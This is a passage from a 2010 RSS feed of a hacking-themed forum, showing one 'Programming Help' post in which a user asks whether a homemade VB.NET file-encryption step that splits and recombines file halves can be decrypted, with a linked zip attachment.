			<dc:creator>A. I.</dc:creator>
			<guid isPermaLink="true">http://www.elitehackers.info/forums/showthread.php?t=23217</guid>
		</item>
		<item>
			<title><![CDATA[can i reverse this? [vb.net]]]></title>
			<link>http://www.elitehackers.info/forums/showthread.php?t=23216&amp;goto=newpost</link>
			<pubDate>Mon, 30 Aug 2010 23:12:05 GMT</pubDate>
			<description>i was trying to make well... pretty much an encryption method and one of the steps splits and combines both halves of the file...anyways is it possible for me to decrypt through this step? 
-- 
Source:BTS-C 
Executable:BTS-C.exe 
in attachments</description>
			<content:encoded><![CDATA[<div>i was trying to make well... pretty much an encryption method and one of the steps splits and combines both halves of the file...anyways is it possible for me to decrypt through this step?<br />
--<br />
Source:BTS-C<br />
Executable:BTS-C.exe<br />
in attachments</div>


	<br />
	<div style="padding:6px">

	

	

	

	
		<fieldset class="fieldset">
			<legend>Attached Files</legend>
			<table cellpadding="0" cellspacing="3" border="0">
			<tr>
	<td><img class="inlineimg" src="http://www.elitehackers.info/forums/titanium/attach/zip.gif" alt="File Type: zip" width="16" height="16" border="0" style="vertical-align:baseline" /></td>
	<td><a href="http://www.elitehackers.info/forums/attachment.php?attachmentid=356&amp;d=1283209776">BHA.zip</a> (4.0 KB)</td>
</tr>
			</table>
		</fieldset>
	

	</div>
]]></content:encoded>
			<category domain="http://www.elitehackers.info/forums/forumdisplay.php?f=3">Programming Help</category>
			<dc:creator>dat hacker</dc:creator>
			<guid isPermaLink="true">http://www.elitehackers.info/forums/showthread.php?t=23216</guid>
		</item>
	</channel>
</rss>
